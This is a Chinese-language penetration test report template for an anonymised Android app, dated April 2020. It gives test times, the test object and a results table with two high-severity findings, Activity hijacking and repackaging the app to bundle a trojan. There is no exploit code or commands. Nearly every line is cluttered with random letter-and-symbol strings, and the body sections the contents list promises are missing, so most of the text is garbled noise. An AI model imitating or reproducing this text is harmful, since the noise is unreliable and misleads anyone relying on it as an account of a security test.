+ B3 J3 h% T& f# V! j; O$ D& t1 L( | O9 j9 Q" J8 M: B' K
: x! g( |, {, @% M" ^
- m( Y7 C3 j+ \) g4 t! q: u' p
: } r0 h3 ^ o( ]+ e7 v- h7 O; U! U
" n) E% p! Q8 s
/ j$ b6 t5 c5 }( x6 c% u! N, _. s* ~- H( G. m' T, h. R0 Q* F
: F' Q* k3 \9 V+ @ A9 }: q( R4 l
4 a! j( I9 s+ b% ]2 R$ m! Y " p8 [9 H) S7 d0 v7 ?' {
/ W9 z/ z8 c/ U" B! p4 K* l4 c
文档编号:
- R% G6 G: {3 d2 }$ S# D: F P' |; A7 V1 K) h$ Q8 p/ }; {( G
$ h: {2 x, `* w& s2 a0 r8 ~& r# Z! F0 h
; q& Z* [" p. \6 U! R' z# I+ {# n3 P; I' W
+ a2 g- o2 l5 o# `7 e( R9 R9 J v# g% j. L+ L
$ X8 L) n- r5 C! ^1 ]0 o
4 @; S7 p# L+ K! D# }! w4 @
1 U7 o. J" Q' E# z7 \# ^ p. \# [9 q% ?( N# w: t
/ y, f! U* {* Q
- A8 f! F; l2 B" a+ u2 o# z& t
, R2 }; r8 U+ y" R& C
7 H8 X6 {: W2 l$ | . |. f, S: W8 H8 n; s
9 @/ P+ E) e7 H7 x/ F: T6 w
% d! c; r, Q& @5 n {* W; p& P0 L
# q% N6 _$ E" C8 l
" G# C! B1 `- X, {
+ {4 F9 X H4 Q6 L5 l3 t3 k! d
$ v7 G5 R& h% Z4 N' r% k1 H. i
! I/ |5 f( t: U( p6 A0 F4 w" v9 y ! z5 v1 O" y% D4 C+ |" B
% a, r0 N1 y' g% k/ }
p6 W+ Y6 w" _3 x" V5 H+ P2 `& N+ v8 H8 J
_/ |2 X0 W+ l" J; h. \& I: t1 w- G3 E0 T( V7 d! H. U
! q0 y4 |( C1 o) N) P- V, |2 P. k3 P! d! E* I$ d# C
/ l/ R1 N4 e" h9 t7 m: H
! ]) h. q: J1 W" j
3 ?% V$ k: i$ E2 {" C5 ^. j) ]5 \0 f* G
某某某APP渗透测试 3 P' i2 o2 Z3 Q* D
9 t& D$ c: s' x; s6 W" R& e- ~
7 F. H* P( |1 Y0 W0 z
4 u1 W" V, V& M. s; l
9 y* y) j1 y& G. K* U) ?! t4 q0 X: E, V) i, a2 i0 j9 C! Z7 r1 V% _+ ?
# ~ p- d$ ^7 v9 [6 x. y
+ k* E" q: r* a6 u* o
! ~) M, \1 ?% h& a- M) e1 u; W
$ P1 v6 h0 d8 F$ m U
8 R) S/ {- {* V) c
" j4 e% h% W% A' Z- w 9 q6 j( F6 K( u9 n5 t
$ a! X8 }; v7 ~5 ]+ l; z& C1 p) q% h* U
8 m* o% R6 e( H' l. {$ m/ \% d
! q) E( N' [8 F- m4 I( _$ C * T( R% g6 }; L3 n# I; I
) p6 X8 k6 R0 f5 F
$ R+ L7 r, H: e8 h4 O6 z7 A, G, R2 K! p
3 h8 j v* }7 F" m/ D+ ]% r" N4 M' J! I' q3 R5 k/ c
+ z* J. V3 h! S( v3 d' Z( g" W; i. } s+ |
# L2 H4 h K6 x$ S. e; e
( u5 D$ s8 y O; c2 A
" S# t3 |9 ?, M9 W0 R
9 l' W5 l/ h0 Y7 N$ Q
* V, L( {1 F2 X2 O
6 q: S+ T6 _. C, ?/ q( s1 { 技 术 报 告 . y& h$ P! [3 I( Z! I1 B5 ~
- R5 l$ _1 y( U- o5 x
S6 b% e% r0 h X" T; M
+ j3 M3 O% ]! w+ p) u# ?
9 Q+ u+ b2 r8 y# y1 S) X! }1 H0 {
+ C+ I% x1 o2 y! X8 b 9 C$ C. [; c! x* q- k: ]) C/ s
* e7 x' j2 k! Q2 ~' @4 ]; M
% l8 p0 E2 h, @& u; d( h0 f& _' [) Z S4 s2 X, m" `6 G4 Z
8 X8 F4 y; j/ _) t, J3 f
% h# K5 Z0 K* ]% T1 |# w! R" a% C
# l9 M1 m" S8 X
7 n n) P9 |, M0 y
, y% A3 w }4 b9 g4 K, W- j1 e% h9 ~* Z! A3 j: w ?7 A9 p
" N h9 L n1 M1 T$ v$ h4 B4 q
0 U" J$ K; O7 x' E + d: I6 z! L9 p. h
) Y' P. K5 [9 T* Q; ^$ Y4 X/ H
) V6 h/ z4 h- e. w/ d3 @3 ]' m/ R8 o1 ~- P& F$ @
+ k3 n* g1 p7 t P+ q% e, c1 F3 L& O0 }9 e/ ?) B
5 `, Y$ U* e, L7 O C) r7 @1 k1 I: b9 q6 o' W4 s. C2 L# a" P. A
& ]( y* z" h, r" j
6 I& ^4 D: d2 ], S( { ; c3 o( h8 u$ d- B
; |. }, t4 N% L8 U7 z& v& y6 F
% o6 h/ u' j3 y$ U: `$ A4 ?
3 o! P @4 J( I. F& @
" U; z% ^2 O) b. u7 S" M6 V" T! K' R* z
% ^4 J+ U1 }' Z
0 D9 j; \; H1 Y$ \& j & f1 J. u& o* l0 P* |8 A
- b2 A- Y$ T' A& b9 a( A
7 K$ g1 B! E- K: H! q
5 T# B6 c" d9 W+ [9 K
# c% u) r( x$ ?; r
1 a2 |( ^9 |) C! G# Z0 i. r0 a 1 E6 t* ]( p* J
' i* Q, [# z/ D
2 W1 m9 o0 Q% ?6 ^9 l9 O" ?
2 R' H5 o5 j* A, ^# h
2 _- [ w4 }; s/ t+ [& i0 ^" f( q! q; p# h( ^$ N7 O
/ F9 W5 k6 y& H0 T9 g
( R i: n) U! K) C
# J: M& n9 s& }! y
0 k- `$ U, ?! I2 Z0 L9 n% N $ V1 x3 w5 ~& C/ @: o
; B& a, W: _/ S
* e& e* N; ^+ J/ I
" ~2 G% ]1 U. Q! z" p* s6 Q6 I
4 k& d# K2 I8 Z
: u n& m, Z4 j+ p; |
, X: Z" w) V3 C) A8 ?8 v; l4 ~) c. h, E1 ~. R( I5 [9 p
7 Y3 g, `1 C8 G& B8 O/ M
" V# p6 v2 @8 w2 g4 J
5 ]/ v7 K- `% k7 j# d
; q' g: _5 I5 I- A
. [+ U0 H0 u8 f3 z
* L. {: r! z/ H, w: e& @5 Y4 T 4 g" M0 d* Y2 C3 H" Z
8 p8 u* b3 P, h6 v3 d* L2 L9 e
/ ~5 h( J$ W6 j/ q8 V
. r) o5 N P8 [ 3 u. z0 |, _: y2 d2 f2 O
' x4 _& l" Y: l" ^% b/ V
; ]6 n( a- U* p. c; c
0 y3 r/ E' H7 w3 f9 c6 Q: u; [ x
( G3 i/ }. b- }2 N3 F
$ j7 U2 `4 W7 ~ }9 P" ^! s
9 G# w4 U. t% Q% Q' O/ W' K
1 @" u9 n; y% ~/ Z
7 U! l! R3 ~# {4 x) y& n& \9 _* z* N: J" ]( m; |/ W
; {" d7 i2 h. Y$ @; C* U& x1 ?* L. p+ K) Y$ x; ~1 j
! [7 Z, R9 t/ E4 t
* l% g$ t% m6 z6 e" J, y) ?) R
1 m: _# D) z6 ]) q( {) s& m) }6 E8 b; z4 n0 w6 D2 M U) N
4 X' r; p9 y' E Y- }2 h* r
& C* O7 I1 h2 z' Y7 }# q# j" k % L. X% @' h! l( v+ m, E! [$ c
2 F4 T: K5 Q/ R3 E8 S! [9 B i9 r , }$ V, B/ L: u. {/ e2 D/ a( m1 r
Z( {7 u4 [; Q
4 Y$ O7 B8 g5 l" \& L) N
( T- @3 W+ Q0 d) _" ?* h& [
: k# T: K; P; a; v: j% }3 |4 t9 k. S- E; b5 {
$ Z, [! X+ h6 e/ l X2 J
1 _' N! P5 R: s' o! K3 B8 U
) c3 J2 v4 X, k5 k
k# `! K. O( K+ `7 U
: m; l' y0 x5 N) H8 b* ?/ C
4 K& `/ H6 p. ~5 p 1 z' f8 Y; Q4 c U8 \
* E4 E1 T+ a0 ?5 j8 N+ u
/ M5 w0 n; R! I: D6 U3 S6 m
1 n2 }8 z* V4 \+ d: K ! w) s! j% d) p& _
4 `3 S3 h7 n- Q$ R/ r4 A7 A9 O
, y9 v) b& ?& K$ e/ \& X1 W1 X
" Z1 }4 U/ u! Q! q7 O
- t+ D+ s0 a7 m0 j1 o8 f7 C8 Z# ?7 C: [6 |: e5 {
+ u: e0 \# w" S6 d4 |
3 d6 O* m( b f5 t5 M2 ] 二〇二〇年 ) Y: X. q+ f! |' w" {( E6 t V
# l; d# _% B' R
0 a5 |$ d& h+ a) s
V* a. ?& `! S. j $ t4 c5 Z- j0 e+ \
9 \2 a7 S! c; ~ }. F& @2 \
9 [5 C* Y# E; f4 E) ?/ o5 m) g; j
/ Q4 Q; J* {1 J& L ~* m3 C+ `. [ # A; _2 Q; C* h. t
7 y- A9 A7 ?9 j. f4 s; O
# l a6 G- J+ [' a
/ b4 |4 o6 i: f$ B7 H$ V2 d
( v. v$ O S% a
! P+ ]- L, L% ~/ f
% }: i2 O" ]: L- }
2 x6 E$ |3 e5 L0 t$ w" x4 b- n + a6 i; t& ~9 p' b
. @0 I$ c7 p9 |( R: G
# u7 C. A4 s y1 F% j; I* Q: W( A' g9 f K: o7 c0 }
1 ~( V. N, r$ o5 J9 H: l. \
5 @! g, @, h0 A5 ` O 目 录 1 ?0 ~ t; c8 l2 d" o; i- N
) J, {& W; }1 H: _; x4 d9 o& r/ V
& v# G% B+ @# t) y4 N# V9 d6 A0 v
$ h$ d# Q1 h( x5 Y & B& X2 ~1 q5 Q
9 V h& Q4 ?/ {* e3 F! f# b % v1 w9 v6 ~! i9 V
# l* X! W' s( B& F9 t 8 _% y0 i+ y' x% {1 m
& T7 P* C7 S/ `* \
- ?) `# s* U$ P3 t' L
' k& n4 Q( T) H! w2 }- J3 y8 a
7 ?" L- e- O. B' e; A8 B; i* T
" { J" \( K( D 1 概述... 3 4 q: w' B# ~& W' u- y% {
4 {9 [$ x! `4 H9 P6 f0 k9 z
* t' F, N$ N$ S: S
2 C* j4 Z; a) ^
, c$ ?; j9 f) C7 z" k5 g* R) N& U* y0 O/ S/ w* t
1.2测试时间... 3
) C" w' h4 f3 R: r% k1 a4 \) Q; L! ?
9 g- h/ N. U% s7 B7 K, R# Q2 D; d8 J$ G: N) ]0 Q4 N+ [! F3 ?9 ^1 K
6 O4 o' Z1 c/ V3 h* p8 N3 f" l
( g" I/ `* J, i' ? 1.3测试对象... 3
! u# V" i) r3 P' R- ^; `9 y0 `$ E' v- H9 d: W: B
& J( ?" `' F6 C5 W& d% V
( r# ~, A% m" u6 n! v : U" k, N0 U0 U- m' N/ C, T3 s
Y- v* e; q3 ?, c
1.4测试结果... 3 h/ Y8 V0 M% v2 a" S
: W1 m7 e- @6 X% p0 [3 A' U
- o0 X4 t4 s7 B
" }' i$ F1 n) i) H
: @: u7 E% R, j
* K, G3 Q# z& U% P3 w# K; `" d; ?9 ~ 2 检测结果... 4 , b" K- C6 V0 u" `/ Y0 s
9 y, }9 {1 v' n
& s: D D! L0 g9 v* T8 b5 Y
B+ E. X- L% }) r2 Q1 ?% [2 M# D 7 o" T8 r; @) t' }
2 r$ \3 F, E2 l+ Q) z 2.1 某某某... 4
) p2 C" F9 ]5 s% s6 n5 c) W
1 ^" c3 p5 _: A( \: I7 z$ G. T/ ~
+ v* S: |$ Z$ c d+ l
5 C; r4 v& b& }1 `6 P4 [; q, I
' g8 Z6 q4 o4 c( q% v0 f' k
* ~7 g. ], Q5 Q8 @6 X 2.1.1检测目标... 4 : W/ L0 i: d$ x3 j# _
9 m; `$ r6 B, ? C: d
& h3 x9 E- d1 X& z7 X9 u+ a
; T0 z( G7 e* C& o! V2 Y4 `6 r 3 m, G! g' T4 b( Q8 _. e
$ ~# H3 H- {5 C
2.1.2检测结果... 4 A: s) E8 ?' N/ F2 j, q! L' K* B( K
: w/ }) S- G$ j6 W/ e: f' l0 u* a
I. B& x( n" ]$ K! t" Z# p
, P& @& H4 n* c j7 Q
4 _( E3 N9 t$ P- t; `) U; }7 W6 l1 Q6 }
% l. Q6 u" h) r" n; I 2.1.2.1. 4 ) Y9 s" k F+ X. f, F3 n
, g! c1 f g* ] o
# y- @( D6 I, g8 {! H* R: {8 h
& A+ Q- I1 U& M7 D& [! m8 w* _. x
% p% G0 v1 x7 m' c6 O3 Z4 j' y. o$ t1 m! Z
2.1.2.2. 6 8 I+ ^" A# L0 s' t l
" r: t% e7 Z$ Q% t! a
! S/ N8 {8 k! u, g
* T- @2 |# F( {& U6 X! O- `3 K
3 X0 o9 i9 h' I/ w& E6 b* b
) g* ]( g, H' l( V; {! C
6 P4 n, R, S* p" \% B; S" O) E$ z4 \' U0 E
9 K" P& e! K' T- g. O o
& L( N( z0 T. C
9 i" ?! R+ F' @! Q. }% d4 l0 Y) R) Z6 K+ K+ {! s+ y
' z5 U `# Q; o6 Y& t* l
+ G8 t; v9 U6 t; F" q6 @
6 G5 K; u# Z: } ^9 q1 C! G- u3 K# s* Q( G( S
+ G7 W( v; U$ |) S% u! @, i5 C
9 d1 f9 k9 d4 l - ?1 O) q7 {- A2 P
9 ^5 V: ~, @( R! e3 L
1 概述
7 G/ x# J# H/ g" J! v: h- z' A6 v
2 j! A" d* ^; e6 f- s
\2 X1 R! |/ i
- O3 k7 l! E3 r6 |* i$ C+ I
3 h4 j R E8 x1 f3 k5 ~0 F. l q. h; t8 L( N X/ X; |
1.2测试时间 , h) m, O0 Y3 `& p! _
" k* k$ H+ }+ l( o+ h
2 J. ]5 E+ N6 ?) u$ ?9 G' V. [) M l6 I/ _/ x6 N0 r$ X. w
% o% x, H9 O; D, _2 G7 @0 |$ r) T; m. [ w5 E7 |
% [2 o/ M# g8 d
7 |2 L' R$ H5 Z1 n0 e( v
( K, N7 Z. R) S9 b, h% b& L! \2 p) S e
| 2 N y5 T5 |/ X& x5 `
% X' g) h5 p; s
* f! A1 `: X) n6 Z
' U9 W3 B9 O. D, R$ @ 渗透测试时间
4 a3 _7 G$ n5 @3 b( `1 [" M. M, x" t6 ^ V4 f) I$ F
% q' k4 L" ^* ]3 O X
/ i! e: ]9 H: U) N
| $ {' } l* Y% h0 d/ V
, I; i; H* o$ j" m( Z$ J
8 g9 U5 P" Z8 V3 U4 A+ m$ g4 p) z
1 b3 K E0 J6 |; v3 ^7 V# O " h2 A/ H0 e" D* E! N3 c7 @8 @
4 K, n' c$ a0 ^, n |
/ u8 w5 {8 L0 p% h+ _
* J2 K" p+ ^4 N4 g* f4 g( y7 z e; w' V }+ G8 Z7 C
: F- K1 L/ A0 {+ F) |7 Q
起始时间 O- ^2 p2 V7 M O4 m2 z; O5 X
* _% l1 A1 x. n* o% A- o# }) }
) \" o8 e/ L- F* _/ ~3 d) D V3 }) D) J8 c! e
| , x+ P) p; ~. g+ f$ |7 K7 u" w
! W' H4 {3 _/ J) |5 S/ h2 Z6 F
8 v/ O0 E4 t7 ^& b5 j2 u3 [0 H
. @7 U' ~3 w2 R
$ G, L0 [6 y3 G
7 R' F: q' K! S' D3 t; u- z 2020年4月6日 + W: G0 U- j" k- g) ]: K
8 ]( x7 _; V# B; p : x" D4 a$ G1 x a" d: p" _5 d
+ R4 U1 m. U# M. S a: V4 v | 5 a) p! h a/ W& u( ]& M- X
, M j1 r9 p. s) n# ?
: f, n+ }5 n; V! W$ n& _, d
: W+ P4 _% p, `# Z6 v! ?4 x" }
/ P/ V" k, b! @7 V8 f) F
+ P; A3 @( [: a/ {
| # h5 ^$ u) ~% E
& E5 M, G9 A7 v' r $ s" Y1 J* |1 e) j+ k. K! R
- g3 F( e& R0 s5 r8 `
结束时间
, Z/ S8 s5 `; V* T5 \! \6 L5 Q; b, ]* ?; d4 z8 L. u
* t# j0 a) B' M( e( i" w1 ]
2 z N/ w# W- q I, i" @+ _
| ' e& |+ E N% Q2 o; T7 ^9 g' m
5 Q0 }: o* i% Z2 @& s1 U/ `) i$ z+ p2 [
1 @+ Y1 o7 n1 Q8 M. B) e0 l4 ~$ v9 W0 b( c4 Q' G# z/ {* T+ ?
0 ^9 P" A! t9 ]9 R7 D2 o% I
' y$ t( a) R" P7 Y8 ]/ S 2020年4月9日
: F% Z* ~$ T, v `* q" M W( {2 Y) J# M) u& a V: M0 C, h! ] V
5 e6 Q- h- l$ }: [8 l* w& q0 C- b, j* B
|
3 T& {4 n& B0 i+ ~( ?6 x
. Y' h/ ]- Q) L% Y3 e% s
; E. m: p. E1 V: z2 I
9 q8 a% O8 w9 o3 t: E : Y- z. j$ L6 }: d( l3 h7 Y7 O
/ `5 R4 x- o, \( x3 k
8 \9 I# Q9 m8 e
6 n0 E3 l6 y0 u+ z; C4 n- G
7 p. G5 ?% y3 I6 Q) ^& ^
2 K+ F; [( S. e% D; Y- f0 m 1.3测试对象
1 g8 O8 j' N% J6 Z% [6 M; c& f+ \# P2 K; S% V# {% L
2 n0 s1 v! W$ E# {2 o
8 ^! @3 t' u% C. D1 w 3 O6 `$ F5 E; R
9 g' P& X C; |/ r, e' @ 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
3 M+ Y) y6 U# X( R& s6 d) e( z4 N" [+ m* o" P6 n2 {
: E' g/ {+ i/ n& l. _
_. r1 ]' u( ?- \ 8 s: o! V/ |# f9 P- C
% f5 F, ~3 J0 w/ y
表1-1 检测对象
0 ]- h, W( M1 `* T% G' U' G4 Z4 r- r1 Q3 F' m; z1 V0 w
6 e0 K- `: o f! @4 I8 c" v1 v, I2 T$ G
7 g# _8 q/ f6 ^6 t; w, s
2 F4 Q( B8 f; J& I N$ }
! ?- p1 D1 C1 |9 y& y1 L
1 |# i3 u) a/ n' E! \# o0 s" L7 C2 b9 p9 e9 m' T/ k% d2 X. ?' ^( z4 [2 v
" m; B9 n8 F( I" L2 p# ^
$ \4 S( o! G+ \; d O |
& }! `; a4 t1 m9 K) K5 @+ U: w
+ x( s1 F" c1 {$ U, M2 W. x 8 D2 i; b) g- ^) r) [
; ?- F0 c* @; H8 A- k" B
序号
* ]: ^' i9 f k
3 D z1 U& ?1 O
, g" U0 ~/ L; j( B0 Q) v* B/ @9 L1 W7 H$ a" S
| 8 u/ F9 j, X; b( Z. a% P' @( K* m }
% ^- Y) ?! A/ i* b/ S I$ l+ c
8 H; H8 V6 Y" h8 }0 [) R7 j
7 q) B5 F2 h# z3 N - e6 O8 K; ]* t3 \
/ h6 S+ N5 N6 _ 测试对象 & t y! o" _1 [8 Y
1 w- A& P4 ^; r) w# p
' E) O) f; V( \7 K0 ]- s
9 |) Z; W8 h6 {% o9 f |
/ v. K# m: A ^" g6 r* S5 h9 \
" s- C7 z' r$ X9 G, x2 x
6 D% z9 S8 q) M- a+ Y
7 r- B1 F }& Y3 U% H * c' ^4 @# ^; A/ R Y
+ [( s* Y; v7 @ 测试地址
0 o! F# l% H5 P6 _9 n2 b+ y& `6 A7 i; K) N
2 g0 N7 y2 y4 B7 s0 n* z- |" ~) j! N- S- ^
| " Y8 k6 k& w6 l9 Q) O. b" ^
7 j* H- ?0 z# x
2 B! J: Y% @+ o$ U. {; ]# u6 {" t& g# P* E$ c0 E
/ [9 X0 V! S! l" ^6 x
9 K1 s! P, L* i) H: D
安全漏洞
8 {' \) b9 o) D- I* R3 ], N$ q2 m3 y* q- O' o
3 z. G" y2 Z4 O8 A3 S) Z% ^# T2 ]+ T/ C# }* J
|
! n! f# V7 y/ j" A" j; ]% \( ~
4 }, M8 P+ Q4 U
C9 u0 R& X: f" g9 a# s0 O9 Z9 J+ n" k, t7 a
% X: G O! W( Z" b5 O. j+ p: a
9 ]( n& } g* r: [7 V d1 X | # V2 t- p/ \. G$ G) L ~" m |
& ]# m% g' [/ j8 j T0 P
, ]0 K1 L7 K7 b+ H/ w6 H
" y% u5 i, M j, w4 Y D
1
& v2 o9 W! u/ A: E3 Y" }2 e% \6 J8 h, Y; ^- t1 F: H
% i+ x, Y2 @' O# z \! G4 @0 L6 u* T' s
| - e5 ^) X- h# V; w+ w' G5 R
8 ]# E- _8 M, n* I: N% b
& z) d3 g/ c$ U$ c! a5 k1 ?6 Z
]4 O6 c3 s! g0 s8 [! ? O2 @ n: {2 G" l( b# F9 e
9 e; z4 Q9 h. s% r
某某某安卓APP
4 F' Y! \* Y2 O7 w: I% d: ]1 M
/ k1 ?$ J \, Z. Q, }( w+ ~3 _) V7 d
| - B1 o% T! n7 `: F3 E3 d& k
6 L7 f* s0 J/ y9 i 4 A. }5 @2 p0 x$ L
$ e2 a- f. J9 B8 e1 O! e7 I8 F2 [
% k: v$ U. ^ g6 C9 N8 i
$ j! k; d2 j8 y
/ p$ w/ d) f. e3 |. @
% u5 i7 f: K) M: l; J h5 w0 L* _) |8 a5 o3 J8 z1 U) U# A
+ _0 C% c: Y! N9 y8 u: ?1 X | % W, `0 v; w. G3 v/ G, U- g. [) T
' q% D, \) v& I! }3 t( ^& p9 C% q
3 E5 |$ |4 W6 w* d$ }3 N1 s) Z' D
( C5 z; x; W8 x& [3 \" N
% A# P; K! x. t9 a7 c$ [& E1 L. c% H5 _8 Y/ @5 E: K" y) m
2
0 J) L; a2 J% {0 J i- c o: |+ c: ?, o5 A/ p% f+ L$ q
, O! N% I6 N8 b. _* ^* @: c
; g& O& ^7 U+ v+ _( m; x& }
|
5 X% v- s; n2 n
, o3 y* z0 v! K) k
# P. p, t1 a! r2 @9 x8 e4 H
, Q' h' d6 `0 R$ A& q# X3 L! ]
0 z4 h8 D$ n. q) ^7 W) [3 m; E* i. ?' w4 r
' \6 y' ?* R( G5 c h5 l& @: y& L. o
( T1 p' l+ r& R' Z 6 t+ H. v: h8 r% o8 j/ K7 h
( N& q! ^+ n7 Q5 ]$ X2 R 1.4测试结果
- A. S0 W( c' w: i, K2 v
6 K% [( t; O8 _7 ^/ V1 ]
7 z9 n. d3 U" R( T
$ ~/ a# t, N: q' k7 L ; j) N, I9 _* x
: O' o3 A- S! [0 ^
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
. W. g, {% v9 S- Q; i/ h9 k# b
6 S5 R9 A: c) p1 r" R9 W2 g, g
6 T2 w: M" q3 S, m4 f
1 d* u( E2 ^. {/ v _
1 D3 j) c' A' n; Z* z; s
2 @1 x9 {$ S8 m) X: l" ^7 \ 1 b+ ^& h4 a/ g+ q( w1 Z
$ y* q% U) r- A/ l5 p
4 e' X; o$ Q* j- G
$ }' Z$ ^ H; |0 S& ]; z
+ }& p: t @% s9 F% p7 M1 W1 j0 X1 S+ D& n1 P2 k5 J
7 l M& @: {. X9 m* x) W! K
4 P# k8 E8 \8 r$ s
9 N# V1 _9 l1 a& V4 X- e( t2 A. ?/ S. ^2 S7 f% L/ L6 {+ a
4 J9 ~ I, l' [4 j, \& V" C3 n- k& j# i; O3 z
|
5 \) G, a, c6 x2 K" M1 M0 O% G5 ^8 i1 i/ Y
" l; t1 s, k8 w5 b# P
$ t: @* }1 X4 q! v$ H( n" k 序号
r# V4 p ?* o$ ~. _5 u7 s4 P9 k" N6 g
( N W' x: h, l* l* X6 |4 q
$ M' d, w6 C9 j& ^0 _9 R |
, \/ D% q/ ~4 @, R# P; M- ~
; J; S2 c# F% j# n ; G ~/ U1 ?2 B" _. u. V
) V4 a% @% l% h- u
1 W, k/ Y4 z0 |2 f8 H7 _* }! H" _9 y4 m# S7 o0 C2 k+ J
系统名称
. w- i; v: @* K- S4 ]2 Q+ }$ k+ r
$ Z2 Z* Z$ R* z& b8 X8 Y* O' u9 g9 l3 Z, u6 ^3 Q
|
6 j9 V# w# B- s' y7 Q0 X/ @6 F2 g/ {; l
" v) t5 y+ O3 ?" {( I
8 x+ r3 L5 O, Y' m% } ' p, c: Y9 E% P! @. b: o' h7 ?
* X9 S P2 y4 k* |# G 漏洞名称 . s+ d8 [+ ~6 P
& Z9 E* ` `# F7 a6 n1 z+ g. s
$ X0 [* o6 t$ k* Z7 e# n L _
& \' b) T" g$ b4 V/ z: _ |
- [+ ~ y! _* u0 @2 @, W
: ]1 c3 X& t0 g4 M: K" u ; U0 Z0 p! z) U( e
6 i# T/ `6 `/ N( e4 ]9 o' a1 U. V
: @/ x7 t- r2 y& v
& d0 k5 s2 R2 q$ ? 漏洞危害 / k! i! y+ M" B0 l
! q7 k0 K# d3 g $ a3 u$ X. Z j2 c9 R( z+ F
# F% r, t$ j0 p$ F' B
| ( ^8 T) g- c1 s" Q6 x5 u6 t0 f
) H9 J) R6 f' m- a+ k) x) D
( c" {2 r& O3 M: X6 n6 f, n* h
! I8 P4 l) Z% v0 q n . {0 D+ [6 z! T _1 n5 t
$ j) q8 M# \3 U' z 修复结果 " d% h6 E# n! c& y1 R+ o$ Y( @
) C8 O9 s9 o3 j- N" q* L
0 f( C% C d) D, y( f
- @/ y0 ?6 I/ g) k6 z! }3 \
| / v$ ^; h$ p8 S2 c5 j
5 v; P" _4 J- N$ y. I
8 \) ~' |3 d% B& X& W
. ]# I8 b7 Z1 b8 i# W1 w @5 G- p" ~* Q
( L( q, I8 | z1 I* g2 n8 J; `2 J, P |
8 f" D! Y7 q! Y, A$ W) v
, s1 e( x: R( q9 v8 g% r" I# w
7 s5 {. ^) |* V: |- p* l1 Q/ D9 Z! b) n
1 , @7 m/ X" r# ^# W$ H7 p
: _8 |$ h, T# g1 _
3 X# G+ S; W, V1 k& r6 ~8 c: l
( X' P- B5 W6 z7 P% n) F2 X7 L | 7 i) t. x2 O' q" G4 ~. s; w
5 M( {7 Z) g: P( D8 Y: B6 _ ; d$ y& Q" [$ e
2 O' |$ \9 o v7 R
6 N2 X6 B" U# i* ?8 b# s# @8 L
3 u5 x% \; s( N* e4 v0 p 某某某某某某APP 3 j, f0 y7 M* W2 D1 q0 G
' q0 T* b, F. Y! m) `1 q 6 L% z" M/ d B& A
k; W* Y% `0 R0 w$ x$ ]4 I
| & U2 h& \7 v [
0 @6 K: i: j; R, }; g' H
* X5 Q# ?8 \( N# y' k- h r7 E
Y2 Z! Y B) z
, R' _5 r3 w* a/ R2 t
" R: g) d$ ]7 ~7 q' [; f' g Activity 劫持 & Y9 j* c* j8 b$ b8 [- H/ j0 V
* u4 A2 g( A, w, E) Y6 v. [
; M! n+ Y; c7 G$ u* q0 P
: K. }. ^5 {! `% y* p/ l4 t& L# V+ p 3 l; l* i5 R# O4 f1 a
8 Q! U8 E4 v8 W + e& w6 j! l/ b& L
1 E$ B8 ~5 j% C+ x$ ^) G; s+ C
. A" _0 {" z2 l) n2 W3 r9 Y. J, j m* B& g7 }
| " j( d3 e% a! n V- f
9 D$ B- R9 l" }1 P( M8 A
3 N+ o$ h! v/ S% P+ i' C1 y! h
4 P9 w0 o& \! T4 y
7 [! \. w/ X# Y- L3 r7 o" R! _ X' f- S" G5 H& ^
高
, ~% g- D3 x! u; _& Z1 V
4 a7 Z& X i& }" h4 y* q! p5 L) J - Y" ?( ~! X/ q& z: \& k6 ]# x. e" m
3 h& T7 l& ~ b9 Y9 ~
| / v* w$ A8 \* i
n( w5 p) z" T) O* F6 }
" i2 i$ r$ D @+ x$ F5 R4 v* `) y% g1 H1 A
1 t3 }/ o s6 z- o# M- R9 w3 _ ) P& ?1 U0 c) P- E+ B, L4 s
# k2 L3 U1 e2 g# U" p
) j1 i* {+ ?) e- |6 D
$ b* c4 w' }1 H p' o- v( s+ I4 o$ \ 1 R( o1 d2 m; x3 j& E
7 X) A. c7 Q) }( ?) B& K+ P
|
' R0 O3 k) c3 s2 {4 p; r; Y& }2 _9 N0 o3 l8 d. ^
8 c& ~# f- Z4 N
6 B7 R4 ]6 Q/ K- p- |0 l, y
8 ^% \2 W* d8 Z p+ \) `3 O0 }3 h
9 r6 Y' ]* V! d) N% t) k6 W, p |
3 s9 k5 |3 I0 V$ Q* M
# r% q5 C9 O! m5 Q ! F, S$ M. J) p% q: U5 {# k( B
0 E9 F) H3 S# p" X
2 9 ]5 c7 A0 f$ }
# D- J% P- n0 k+ A/ S# F
5 o! n- W# r1 z9 R
8 z! l- m( j% H# F+ ] | 6 |* R& Q: d; V2 k6 L: m0 m; j
! S5 r3 b. w0 M( p( h
4 G- A% o6 S* y
' C2 ~$ O- i, w( _
) c4 L( A" h P" z9 q8 q( q" E5 q) x, p- l9 n
某某某某某某APP
7 s2 L8 [% l1 S: {+ {& [+ y6 o% { y" n" D- {4 ^
# h( ?; e5 H& j) y! }
1 k+ U* d* K+ i7 S6 D |
& D a8 T7 S: g8 h+ Z- e! W
" h" o1 T1 {9 c& U 9 E" j* h: P" V" N
) l" t- M7 q4 H, s: u9 M' l$ g
. @: v V1 E+ b( O# T* H
: u) o$ a S4 h+ s! }" W7 J4 M+ c 反编译二次打包捆绑木马、篡改APP代码
+ k$ W. D; E; y7 A3 |: E( k7 [3 H3 R `; F
9 j; Q. ^6 s% A* f5 { Q
- G: ^0 w+ L0 T+ K: w) }) g |
* \) i( N2 l& o- X9 E" O" S- h$ a3 ` \7 f; l( J4 n. o" ~7 t. s
% ?; l! o+ ]1 A+ j8 n" ]! ?4 j6 ], x! O$ b
8 {1 N( Y9 B% Q9 i
- F4 E; w8 L0 V+ p1 t 高
; E1 l& d& y5 ^& e, f6 N( O
' q3 h1 o' V" V, k$ j 4 q$ X* |, B; t1 p
! \# v0 G& ^7 S5 z) ?5 u' s | 2 V! U3 U( i! z7 S% ^4 X' o
# b1 D5 \7 k# C. x; |6 j. H# |
3 G7 |- A) k. M2 D: u
9 {% f6 k+ |. Z. ?4 Y3 {9 w" K6 P
0 F& W! v# _3 G( M; Q' M( w A+ O2 |8 d! Y+ g- T! I
2 @* N1 C; |$ \
4 H" |. u* {. @, a( i* s
( C" c& M9 V/ K5 `& {+ C7 d! G6 f( b
9 T' w5 O& q c" I& E; F | $ K( y" K# A5 |2 O4 _# B
1 {5 X4 f0 B' W, B9 d5 w# \: c, m
) T7 J3 C% ^5 Y, N
8 c/ z, X5 c* U. K$ B
& q% E: u" K. x; l9 Z+ N" a! k D1 r+ o. m. W* E3 O8 s9 `0 K
$ G. A/ S1 H j. R! B, L8 W# Q- R( a3 d G
